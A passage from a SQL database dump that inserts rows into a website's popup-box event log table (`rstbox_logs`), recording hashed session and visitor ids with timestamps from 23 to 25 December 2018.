(42127, '4365f5f1b8a11a647a41bc11df09cc96', '544792a504897a83', 0, 2, 1, '2018-12-23 12:10:00'),
(42128, '114eebcff1bbe881e8870a47825984f9', '6ec4b4f916b8de26', 0, 2, 1, '2018-12-23 12:10:10'),
(42129, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 12:10:25'),
(42130, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 12:10:47'),
(42131, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 12:10:49'),
(42132, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 12:10:53'),
(42133, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 12:11:01'),
(42134, 'aff8c97f3b9bdefdc1c22eaed5eaa62c', '049dbeed11095c77', 0, 2, 1, '2018-12-23 12:11:13'),
(42135, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 12:11:21'),
(42136, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 12:11:27'),
(42137, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 12:11:37'),
(42138, 'aff8c97f3b9bdefdc1c22eaed5eaa62c', '049dbeed11095c77', 0, 2, 1, '2018-12-23 12:11:43'),
(42139, '7d1783063747afda852d5e78758bfba4', 'ed8fddef90c77d16', 0, 2, 1, '2018-12-23 12:11:44'),
(42140, '7d1783063747afda852d5e78758bfba4', 'ed8fddef90c77d16', 0, 2, 1, '2018-12-23 12:11:52'),
(42141, '8f502b602770ade58fccedb1cdd8e055', '0b83b588375e9508', 0, 2, 1, '2018-12-23 12:12:45'),
(42142, 'ab5dd288d9f400265fde01775b79a8fe', '1ec75219d7482e28', 0, 2, 1, '2018-12-23 12:14:24'),
(42143, '8996c6e5145e7f4886154b9c8bb183d6', '8e000ebb2befd204', 0, 2, 1, '2018-12-23 12:14:24'),
(42144, '4365f5f1b8a11a647a41bc11df09cc96', '544792a504897a83', 0, 2, 1, '2018-12-23 12:15:35'),
(42145, '8f502b602770ade58fccedb1cdd8e055', '0b83b588375e9508', 0, 2, 1, '2018-12-23 12:16:01'),
(42146, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 12:17:24'),
(42147, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 12:20:38'),
(42148, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 12:20:47'),
(42149, 'd1b8e9edebbb3b620f10ca1f1eb24571', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:21:02'),
(42150, '9d4ced31f73a09cf863b2593cf5b1727', '320bf2e21f88f143', 0, 2, 1, '2018-12-23 12:21:28'),
(42151, 'd1b8e9edebbb3b620f10ca1f1eb24571', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:21:47'),
(42152, 'dd7bfd2469fc73a60049eefd9422a63c', '2998307f9ed29620', 0, 2, 1, '2018-12-23 12:21:48'),
(42153, 'd1b8e9edebbb3b620f10ca1f1eb24571', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:21:58'),
(42154, 'dd7bfd2469fc73a60049eefd9422a63c', '2998307f9ed29620', 0, 2, 1, '2018-12-23 12:22:06'),
(42155, '9d4ced31f73a09cf863b2593cf5b1727', '320bf2e21f88f143', 0, 2, 1, '2018-12-23 12:22:13'),
(42156, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:27:58'),
(42157, '8996c6e5145e7f4886154b9c8bb183d6', '8e000ebb2befd204', 0, 2, 1, '2018-12-23 12:28:01'),
(42158, '8996c6e5145e7f4886154b9c8bb183d6', '8e000ebb2befd204', 0, 2, 1, '2018-12-23 12:28:05'),
(42159, '8996c6e5145e7f4886154b9c8bb183d6', '8e000ebb2befd204', 0, 2, 1, '2018-12-23 12:28:09'),
(42160, '8996c6e5145e7f4886154b9c8bb183d6', '8e000ebb2befd204', 0, 2, 1, '2018-12-23 12:28:12'),
(42161, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 12:28:39'),
(42162, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 12:33:48'),
(42163, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-23 12:38:31'),
(42164, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 12:39:31'),
(42165, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 12:39:36'),
(42166, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 12:40:27'),
(42167, 'd1b8e9edebbb3b620f10ca1f1eb24571', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-23 12:41:32'),
(42168, '8d3e847a0ec5ace8a9d7026562e4d989', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-23 12:44:08'),
(42169, '6945b033af9a79df0f3b0cad77fba1da', 'c50d241992a23c4c', 0, 2, 1, '2018-12-23 12:45:01'),
(42170, '6945b033af9a79df0f3b0cad77fba1da', 'c50d241992a23c4c', 0, 2, 1, '2018-12-23 12:45:14'),
(42171, '8f502b602770ade58fccedb1cdd8e055', '0b83b588375e9508', 0, 2, 1, '2018-12-23 12:47:40'),
(42172, '0ea44c7bb9477c34edce839e8628ce26', '094c4fc3019f9165', 0, 2, 1, '2018-12-23 12:47:54'),
(42173, 'a9792bd9898166e92cecce9f888bf786', '51df446c19685386', 0, 2, 1, '2018-12-23 12:48:42'),
(42174, '3272b29d5fed535a7a3041146a18add6', '8a144e5fc2e94311', 0, 2, 1, '2018-12-23 12:52:06'),
(42175, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 12:55:42'),
(42176, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 13:00:26'),
(42177, '061a58eb2d326c4c10b04bd975e4ffa4', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 13:00:30'),
(42178, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 13:01:12'),
(42179, '3643c882337d378fb8fae9537a589856', '30f2212981adef2f', 0, 2, 1, '2018-12-23 13:03:24'),
(42180, '3643c882337d378fb8fae9537a589856', '30f2212981adef2f', 0, 2, 1, '2018-12-23 13:03:33'),
(42181, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 13:11:50'),
(42182, '98b57e1cf48d17e7389e5ea9433cab29', 'c423a976f7958be7', 0, 2, 1, '2018-12-23 13:20:07'),
(42183, '0180b8af9318d2c2cd4983a637bada6e', 'c50d241992a23c4c', 0, 2, 1, '2018-12-23 13:23:17'),
(42184, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-23 13:23:41'),
(42185, '566b1e03eb970b2d2eed7380c9d28fa3', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 13:25:20'),
(42186, '566b1e03eb970b2d2eed7380c9d28fa3', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 13:26:39'),
(42187, 'c454df882430f4341d7a82b595227218', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-23 13:27:26'),
(42188, '661281847a633be9f8247b18d5f2eda2', '89872404186e372a', 0, 2, 1, '2018-12-23 13:33:38'),
(42189, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-23 13:48:49'),
(42190, 'c84b781738d4ed1c048c0576b93d5f70', 'abe6c8ead564b456', 0, 2, 1, '2018-12-23 13:59:44'),
(42191, 'c84b781738d4ed1c048c0576b93d5f70', 'abe6c8ead564b456', 0, 2, 1, '2018-12-23 14:00:45'),
(42192, 'c84b781738d4ed1c048c0576b93d5f70', 'abe6c8ead564b456', 0, 2, 1, '2018-12-23 14:00:51'),
(42193, '1952d8b8f2b6f84b7f0d42e603fd9281', 'a24296fc33f6f941', 0, 2, 1, '2018-12-23 14:09:07'),
(42194, '97c65ea893345889fc3c18a2157a1e8e', '4e501d9346eb6aae', 0, 2, 1, '2018-12-23 14:34:26'),
(42195, 'ee085e0c7576409b0f5a6b2e55a0015b', '8724b8038bb9dc9d', 0, 2, 1, '2018-12-23 14:46:53'),
(42196, '358ebd8db16ad81eef0eb2386c946072', '5211c921a0e88298', 0, 2, 1, '2018-12-23 15:04:02'),
(42197, '358ebd8db16ad81eef0eb2386c946072', '5211c921a0e88298', 0, 2, 1, '2018-12-23 15:04:31'),
(42198, '358ebd8db16ad81eef0eb2386c946072', '5211c921a0e88298', 0, 2, 1, '2018-12-23 15:04:58'),
(42199, '358ebd8db16ad81eef0eb2386c946072', '5211c921a0e88298', 0, 2, 1, '2018-12-23 15:05:37'),
(42200, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-23 15:17:37'),
(42201, '358ebd8db16ad81eef0eb2386c946072', '5211c921a0e88298', 0, 2, 1, '2018-12-23 15:24:49'),
(42202, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-23 15:28:48'),
(42203, 'c99fc2b2a4beda50ffc3e4dc34f5b9ba', 'd09a3a195511f770', 0, 2, 1, '2018-12-23 15:34:04'),
(42204, 'c99fc2b2a4beda50ffc3e4dc34f5b9ba', 'd09a3a195511f770', 0, 2, 1, '2018-12-23 15:34:20'),
(42205, 'e04cb23ac1af6d08027a883508dc62e3', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 15:35:52'),
(42206, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-23 15:37:15'),
(42207, 'aa99f211ea8d75cfa710276886fa9843', '1568b5f71df523b9', 0, 2, 1, '2018-12-23 15:40:12'),
(42208, 'aa99f211ea8d75cfa710276886fa9843', '1568b5f71df523b9', 0, 2, 1, '2018-12-23 15:40:39'),
(42209, 'aa99f211ea8d75cfa710276886fa9843', '1568b5f71df523b9', 0, 2, 1, '2018-12-23 15:41:06'),
(42210, 'b9d17e7612a20895779eef6afcc1c901', '51fdefdc51057437', 0, 2, 1, '2018-12-23 15:51:21'),
(42211, 'd44409e786c8b18d1c39bdf2b0851f58', '9f708ebcce346d3a', 0, 2, 1, '2018-12-23 16:14:06'),
(42212, 'f7aaf87eae2b1ecda9e01f493c52e47c', '6d8223de99afd563', 0, 2, 1, '2018-12-23 16:22:58'),
(42213, '3b6550787b55e3345e71d25a5b962db0', '935c0d5f319df5e1', 0, 2, 1, '2018-12-23 16:36:00'),
(42214, '0ad229d1b630a2e6508287c5d5e84bc1', '4ad2bae2476c07d2', 0, 2, 1, '2018-12-23 16:43:02'),
(42215, '10ffc9f221b191f7378e844b3fda98c8', '9db8ff71d4d8723d', 0, 2, 1, '2018-12-23 16:43:58'),
(42216, '7d1783063747afda852d5e78758bfba4', 'ed8fddef90c77d16', 0, 2, 1, '2018-12-23 16:47:47'),
(42217, '7d1783063747afda852d5e78758bfba4', 'ed8fddef90c77d16', 0, 2, 1, '2018-12-23 17:00:39'),
(42218, '7d1783063747afda852d5e78758bfba4', 'ed8fddef90c77d16', 0, 2, 1, '2018-12-23 17:00:46'),
(42219, 'b9726100ead982163bbb9422bbcad78d', 'd486b888d880d410', 0, 2, 1, '2018-12-23 17:02:22'),
(42220, '94fef293c86ccc8501461e4e1b5bbc9b', '3e431c013138bb3f', 0, 2, 1, '2018-12-23 17:14:44'),
(42221, '53f4d4a23a0134158fcbbde4923888bc', 'ff744a4d90b6a515', 0, 2, 1, '2018-12-23 17:30:16'),
(42222, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 17:38:45'),
(42223, '963a9df11df5611effa3bc9a20da18b5', 'f556605047b35dd8', 0, 2, 1, '2018-12-23 18:01:37'),
(42224, '963a9df11df5611effa3bc9a20da18b5', 'f556605047b35dd8', 0, 2, 1, '2018-12-23 18:01:51'),
(42225, 'd36bbcd82be147bd7933d0bf8ddc643a', '29ce8aa515acb63b', 0, 2, 1, '2018-12-23 18:39:14'),
(42226, '247eda23e358e0f8e99ebdb35240b61c', 'f556605047b35dd8', 0, 2, 1, '2018-12-23 18:50:21'),
(42227, '67f0bed59eea8d87d5afb4685606f86d', 'ac1257653a309ba1', 0, 2, 1, '2018-12-23 18:51:33');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(42228, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-23 18:52:04'),
(42229, 'ce5b19d4bd139658623b969076d156c4', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 19:04:02'),
(42230, 'c6255d802c562d4ef28085486f6ee2a3', '103b677b95c717ad', 0, 2, 1, '2018-12-23 19:08:36'),
(42231, 'c6255d802c562d4ef28085486f6ee2a3', '103b677b95c717ad', 0, 2, 1, '2018-12-23 19:13:36'),
(42232, '030d5afe8a185e2699289f0b71c65724', '5d8f24c2d4e2bdc6', 0, 2, 1, '2018-12-23 19:27:51'),
(42233, '247eda23e358e0f8e99ebdb35240b61c', 'f556605047b35dd8', 0, 2, 1, '2018-12-23 19:30:47'),
(42234, '247eda23e358e0f8e99ebdb35240b61c', 'f556605047b35dd8', 0, 2, 1, '2018-12-23 19:31:07'),
(42235, '4e941c5be74321e2491d168d1e266650', '2062cbe05602b2e7', 0, 2, 1, '2018-12-23 21:08:44'),
(42236, '53dcd6cf1bc0e660bce4f1eb72a785a1', '040202d70e0f8746', 0, 2, 1, '2018-12-23 23:28:27'),
(42237, 'd1f11d9591a741df2b2ef21c76c49413', '7c5bcf99f2070582', 0, 2, 1, '2018-12-24 01:04:11'),
(42238, 'd1f11d9591a741df2b2ef21c76c49413', '7c5bcf99f2070582', 0, 2, 1, '2018-12-24 01:04:18'),
(42239, 'd01c68c31d634734c3d738e7705e79b9', '22503fd8c6bd1b76', 0, 2, 1, '2018-12-24 02:54:35'),
(42240, 'ab33a584c1a2b62856efe4cd86f259f8', '6ed003f4a5a33085', 0, 2, 1, '2018-12-24 03:04:18'),
(42241, '8611e761bd1f2b96880853f755454345', '3b5247cf318b78b5', 0, 2, 1, '2018-12-24 03:36:02'),
(42242, 'af8d209c07730971d2fd118894625afe', '3f79acb0315ae88f', 0, 2, 1, '2018-12-24 03:40:20'),
(42243, 'af8d209c07730971d2fd118894625afe', '3f79acb0315ae88f', 0, 2, 1, '2018-12-24 03:42:33'),
(42244, '4095419c07ec03bdf2224d5fcecc7bb7', 'd4e030a3f317b1d1', 0, 2, 1, '2018-12-24 04:16:07'),
(42245, '4095419c07ec03bdf2224d5fcecc7bb7', 'd4e030a3f317b1d1', 0, 2, 1, '2018-12-24 04:17:58'),
(42246, '1fe761a07215f60f321a04426edfc2af', 'a34c0a4378a66a53', 0, 2, 1, '2018-12-24 04:33:19'),
(42247, '1eabbe2c11ec72be13e57d540474c2c7', '825b0ebebc8b987f', 0, 2, 1, '2018-12-24 04:42:08'),
(42248, 'a266b1d74352e379717de5aecb1109b8', '3bba427615c10aaf', 0, 2, 1, '2018-12-24 05:04:04'),
(42249, 'a266b1d74352e379717de5aecb1109b8', '3bba427615c10aaf', 0, 2, 1, '2018-12-24 05:06:41'),
(42250, 'a266b1d74352e379717de5aecb1109b8', '3bba427615c10aaf', 0, 2, 1, '2018-12-24 05:06:53'),
(42251, '24243018d86a0deae5d86cdf9a967d8c', '19dba98cb9cf777c', 0, 2, 1, '2018-12-24 05:24:15'),
(42252, 'bdc80fadb2e8b48a35d853c13dec7045', 'fc1e6ecf503c2342', 0, 2, 1, '2018-12-24 05:43:11'),
(42253, '98368d9b1cc4a6066a5b7ad5b9935f77', 'ae7bea14c09173b9', 0, 2, 1, '2018-12-24 05:50:46'),
(42254, '21ff45430de54ac1f842b38cc33aff61', '406b7ce526385704', 0, 2, 1, '2018-12-24 05:52:07'),
(42255, '21ff45430de54ac1f842b38cc33aff61', '406b7ce526385704', 0, 2, 1, '2018-12-24 05:57:59'),
(42256, '21ff45430de54ac1f842b38cc33aff61', '406b7ce526385704', 0, 2, 1, '2018-12-24 05:58:30'),
(42257, '04e08ed23f1df2799454baa1a1e40de1', '5ab81f6ab0f9c34f', 0, 2, 1, '2018-12-24 06:09:01'),
(42258, '1e87db5a446652658690927103857e0e', '8e49ed0dd89e5535', 0, 2, 1, '2018-12-24 06:10:25'),
(42259, 'f8eb57068088020c3b32929e2c32303c', 'd620787d14831225', 0, 2, 1, '2018-12-24 06:11:53'),
(42260, 'd964bb8e19836b91d482654fb5d66dc2', '19dba98cb9cf777c', 0, 2, 1, '2018-12-24 06:12:30'),
(42261, 'd964bb8e19836b91d482654fb5d66dc2', '19dba98cb9cf777c', 0, 2, 1, '2018-12-24 06:14:56'),
(42262, 'd964bb8e19836b91d482654fb5d66dc2', '19dba98cb9cf777c', 0, 2, 1, '2018-12-24 06:15:13'),
(42263, 'af0fd4e7360d8e63a0ab3eb32a3c3ba2', 'a04f3e34f6127e26', 0, 2, 1, '2018-12-24 06:15:16'),
(42264, '4bc8403da0358fd329d61ce527342845', 'f516f458ae12077f', 0, 2, 1, '2018-12-24 06:16:57'),
(42265, 'e265e3df87afcbba105f0458eaa55255', 'f786ec0156229527', 0, 2, 1, '2018-12-24 06:22:26'),
(42266, 'daeab130ef63a1f04be24cbba6197a7d', '2ec6dcb689c6bd79', 0, 2, 1, '2018-12-24 06:48:51'),
(42267, '0888d08814f776b205b7d7b88da06673', 'b532b044d2afb3e7', 0, 2, 1, '2018-12-24 06:52:15'),
(42268, '0dd905bcc3b0689667166b4581d72d71', '0b83b588375e9508', 0, 2, 1, '2018-12-24 07:06:36'),
(42269, 'bf4e1834cebd2b9da3f56e4f94839e9d', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-24 07:31:08'),
(42270, '3f29634b46ae7ca69b55a046987e89ea', '4b65cf02bb58bf3a', 0, 2, 1, '2018-12-24 07:59:27'),
(42271, 'e4d8ca2b4a0e314a5513c502654961bb', 'd688a671e5c0e1b3', 0, 2, 1, '2018-12-24 08:05:26'),
(42272, '9afdf1116f7cfbca9fb133d6263387ca', 'b54209c6a3cd33db', 0, 2, 1, '2018-12-24 08:21:25'),
(42273, 'bb57aa9de890056725dce1494f57377c', '20861535eea3852d', 0, 2, 1, '2018-12-24 08:28:04'),
(42274, '999e70dfcb4ca5d68fb622b048183591', '81f6a2b51298a08a', 0, 2, 1, '2018-12-24 08:46:47'),
(42275, '999e70dfcb4ca5d68fb622b048183591', '81f6a2b51298a08a', 0, 2, 1, '2018-12-24 08:51:34'),
(42276, '999e70dfcb4ca5d68fb622b048183591', '81f6a2b51298a08a', 0, 2, 1, '2018-12-24 08:52:26'),
(42277, '7e84e36042624f8a457650241577ab1a', '0cb874f42fc5f416', 0, 2, 1, '2018-12-24 08:54:24'),
(42278, '886e79024f4544183786c040503bfc55', '8a144e5fc2e94311', 0, 2, 1, '2018-12-24 09:19:58'),
(42279, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-24 09:21:58'),
(42280, 'c6255d802c562d4ef28085486f6ee2a3', '103b677b95c717ad', 0, 2, 1, '2018-12-24 09:29:10'),
(42281, 'c6255d802c562d4ef28085486f6ee2a3', '103b677b95c717ad', 0, 2, 1, '2018-12-24 09:36:47'),
(42282, 'b02a1969e31d42d828e6e97837c1c9cd', 'ea9410bf7dd63565', 0, 2, 1, '2018-12-24 09:48:50'),
(42283, 'd1f11d9591a741df2b2ef21c76c49413', '7c5bcf99f2070582', 0, 2, 1, '2018-12-24 10:57:24'),
(42284, '586ced1e6dc71e8c2a1b56edcd8d0df4', '3cb9275c709b1992', 0, 2, 1, '2018-12-24 11:13:19'),
(42285, '586ced1e6dc71e8c2a1b56edcd8d0df4', '3cb9275c709b1992', 0, 2, 1, '2018-12-24 11:13:38'),
(42286, '3121a33cc2f76cf99e077c2ff42ef45b', '501f4cc5111ad8fe', 0, 2, 1, '2018-12-24 11:39:09'),
(42287, '3121a33cc2f76cf99e077c2ff42ef45b', '501f4cc5111ad8fe', 0, 2, 1, '2018-12-24 11:39:28'),
(42288, '3121a33cc2f76cf99e077c2ff42ef45b', '501f4cc5111ad8fe', 0, 2, 1, '2018-12-24 11:40:50'),
(42289, '3121a33cc2f76cf99e077c2ff42ef45b', '501f4cc5111ad8fe', 0, 2, 1, '2018-12-24 11:41:08'),
(42290, 'b8ca775086373318d2ebdff469432d45', '9a903552e28cf43c', 0, 2, 1, '2018-12-24 11:47:19'),
(42291, 'b8ca775086373318d2ebdff469432d45', '9a903552e28cf43c', 0, 2, 1, '2018-12-24 11:47:29'),
(42292, 'b8ca775086373318d2ebdff469432d45', '9a903552e28cf43c', 0, 2, 1, '2018-12-24 11:47:42'),
(42293, '21ff45430de54ac1f842b38cc33aff61', '406b7ce526385704', 0, 2, 1, '2018-12-24 12:15:54'),
(42294, '8d6a36a1c3c00a1970225997228f05ff', '17df7e7649a1f9e6', 0, 2, 1, '2018-12-24 12:22:56'),
(42295, '023ca7cdf4c57d9d7cbda71b44570c0b', '5df1dcc4e93594b4', 0, 2, 1, '2018-12-24 12:44:39'),
(42296, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 12:55:57'),
(42297, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 12:56:44'),
(42298, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 12:59:04'),
(42299, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 13:00:01'),
(42300, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 13:01:10'),
(42301, 'a2b465442a7120b174f959766fad04b4', 'f5644f3918ed60c7', 0, 2, 1, '2018-12-24 13:01:51'),
(42302, 'e92e5ac3501dd979b6ef60ddfddaea22', 'be7c7b67677bd41d', 0, 2, 1, '2018-12-24 13:26:58'),
(42303, '682dccf12e22fe244102856ce0ce7278', '00faa96995f0d7be', 0, 2, 1, '2018-12-24 14:11:33'),
(42304, 'bb9b95e194347987cf3ec7a246a75683', 'b8248daf230c984d', 0, 2, 1, '2018-12-24 14:17:11'),
(42305, '9d0b7d71758c276bc2975a734539bbe4', '2c630ca6128ef54a', 0, 2, 1, '2018-12-24 14:28:59'),
(42306, '4b42e4adbb38c37e91228dbf4cd99e44', '6bc83050ed3b1ce6', 0, 2, 1, '2018-12-24 15:08:46'),
(42307, 'a9d56d66e2031d57e93469b0f99729bb', '71af8a3e9978c330', 0, 2, 1, '2018-12-24 15:18:20'),
(42308, 'a5fc574e3f23f538d19ed2663d6f9517', 'e40a1ecae05e594f', 0, 2, 1, '2018-12-24 15:23:48'),
(42309, '55a9fb74b0ab8fb1276a501fb6a98907', '85119d340f6fafd4', 0, 2, 1, '2018-12-24 15:26:39'),
(42310, '55a9fb74b0ab8fb1276a501fb6a98907', '85119d340f6fafd4', 0, 2, 1, '2018-12-24 15:27:02'),
(42311, '29c393d41538e4baa78bd33f38db48ee', 'fbc00c3944bcbc47', 0, 2, 1, '2018-12-24 15:27:53'),
(42312, '571cfa56c93a8bbfd17994f73ba0eab5', '46c81dccb912364d', 0, 2, 1, '2018-12-24 16:47:48'),
(42313, 'ee1d88c6524e3d866d9906f4d91f255a', 'f581e4b759581b56', 0, 2, 1, '2018-12-24 17:08:46'),
(42314, 'ee1d88c6524e3d866d9906f4d91f255a', 'f581e4b759581b56', 0, 2, 1, '2018-12-24 17:09:11'),
(42315, 'ee1d88c6524e3d866d9906f4d91f255a', 'f581e4b759581b56', 0, 2, 1, '2018-12-24 17:09:38'),
(42316, 'ce74bbf90d4db69e1c9e5d930d910315', '09ca1fc3d44652dc', 0, 2, 1, '2018-12-24 17:09:41'),
(42317, 'ee1d88c6524e3d866d9906f4d91f255a', 'f581e4b759581b56', 0, 2, 1, '2018-12-24 17:10:18'),
(42318, 'aad857230aeadd10c6226e761fc534f1', '9943d42d6f00bbee', 0, 2, 1, '2018-12-24 17:16:04'),
(42319, '3eeff585f2d986d17b4fe2772b5baf04', '9c4eb35bca560c70', 0, 2, 1, '2018-12-24 17:25:44'),
(42320, 'd7006e4fb331dc4b9dba60ca2c089359', 'd96fc9bbaea97f6c', 0, 2, 1, '2018-12-24 18:33:36'),
(42321, 'edea79339b2796d183fd6bb6d1f237ea', '8acbdb86ef996988', 0, 2, 1, '2018-12-24 18:45:32'),
(42322, '51f50f8f37d8e3c4d8fe276e15f78a82', '827f27e54f0066cc', 0, 2, 1, '2018-12-24 18:50:06'),
(42323, 'f8fa600d40c32f9a53b6ca0d85968588', 'a6228a8c2c8e5a83', 0, 2, 1, '2018-12-24 20:26:28'),
(42324, 'e1ff90898ebf2b27fd4c68ad9ab25451', '52aa9e0502f94486', 0, 2, 1, '2018-12-24 20:27:40'),
(42325, 'cef76ebe2fa8ae5bca2465b9f23af044', 'dbea876ef73bb8ae', 0, 2, 1, '2018-12-24 20:32:05'),
(42326, 'edea79339b2796d183fd6bb6d1f237ea', '8acbdb86ef996988', 0, 2, 1, '2018-12-24 20:34:40'),
(42327, 'edea79339b2796d183fd6bb6d1f237ea', '8acbdb86ef996988', 0, 2, 1, '2018-12-24 20:38:22'),
(42328, '523e255416998ef9316f1639d28c0648', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-24 20:38:30'),
(42329, 'edea79339b2796d183fd6bb6d1f237ea', '8acbdb86ef996988', 0, 2, 1, '2018-12-24 20:39:00'),
(42330, 'edea79339b2796d183fd6bb6d1f237ea', '8acbdb86ef996988', 0, 2, 1, '2018-12-24 20:39:13'),
(42331, '0d1749adfd92f1af1a07923c69906182', '8e973a89f89446e8', 0, 2, 1, '2018-12-24 20:42:02'),
(42332, '55315cfe5628797a475445dbaa93f40b', 'c9cde7ff3efec402', 0, 2, 1, '2018-12-24 20:45:03'),
(42333, 'ee36fb9972f82d9cd5dc304c237a6ca2', '309b8c58a6385b15', 0, 2, 1, '2018-12-24 20:53:01'),
(42334, '142231839999d14644310b638d1d8244', '15bcb185161ffae2', 0, 2, 1, '2018-12-24 21:04:06'),
(42335, '4a534939f41b437e8b45b66f004ba864', '3988d6ad2a3cce64', 0, 2, 1, '2018-12-24 21:05:18'),
(42336, '142231839999d14644310b638d1d8244', '15bcb185161ffae2', 0, 2, 1, '2018-12-24 21:21:50'),
(42337, 'd5332a55f016ec137983902006138edc', '3e855a159d22a254', 0, 2, 1, '2018-12-24 21:33:59'),
(42338, '607aabbccbea24b398841928061bdb11', '5cb606e7cab6f810', 0, 2, 1, '2018-12-24 21:40:09'),
(42339, 'f84957abe9345c0b97c83393052b8c74', '624d6937076d1188', 0, 2, 1, '2018-12-24 21:41:01'),
(42340, 'f84957abe9345c0b97c83393052b8c74', '624d6937076d1188', 0, 2, 1, '2018-12-24 21:41:29'),
(42341, 'f84957abe9345c0b97c83393052b8c74', '624d6937076d1188', 0, 2, 1, '2018-12-24 21:42:05'),
(42342, '607aabbccbea24b398841928061bdb11', '5cb606e7cab6f810', 0, 2, 1, '2018-12-24 21:42:51'),
(42343, 'd53c2308b23b8cf30d8db3e90e435466', '8eab3d0a58c1d94c', 0, 2, 1, '2018-12-24 21:46:49'),
(42344, '1d6f5cecac86d45419729d13dfe6f5a7', 'f24c2bf82a12d21c', 0, 2, 1, '2018-12-24 22:22:44'),
(42345, '41db5e397af66d7a774376045feb5ccb', '77867ddff2ffe5fb', 0, 2, 1, '2018-12-24 23:41:23'),
(42346, 'b3a740f7d07b1d93988132c57e3b028c', 'cb2b05b2dc03d750', 0, 2, 1, '2018-12-25 00:06:49'),
(42347, 'bd9031e7af7bbf01dfaec4276042cd76', '780f6589572be01a', 0, 2, 1, '2018-12-25 00:19:50'),
(42348, '7112c9641efb8cb086e448f066a6504d', '189fa522574da189', 0, 2, 1, '2018-12-25 00:36:09'),
(42349, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-25 00:39:18'),
(42350, '79121a58ad5324af6b19bda76ee8c909', '31c9a70190c51887', 0, 2, 1, '2018-12-25 00:56:22'),
(42351, '0b185b654a3b11bb23ee0ea0ff41aa33', '2f296c7326816bbf', 0, 2, 1, '2018-12-25 00:56:34'),
(42352, '0b185b654a3b11bb23ee0ea0ff41aa33', '2f296c7326816bbf', 0, 2, 1, '2018-12-25 00:56:48'),
(42353, '0b185b654a3b11bb23ee0ea0ff41aa33', '2f296c7326816bbf', 0, 2, 1, '2018-12-25 00:57:04'),
(42354, 'cb1067be493e4ff29326ea746a8332d5', '0ea2f9ce2dd233f6', 0, 2, 1, '2018-12-25 01:10:30'),
(42355, 'aecb2249d7c3b426a4739090891cd25d', '1f1124b058615572', 0, 2, 1, '2018-12-25 01:14:18'),
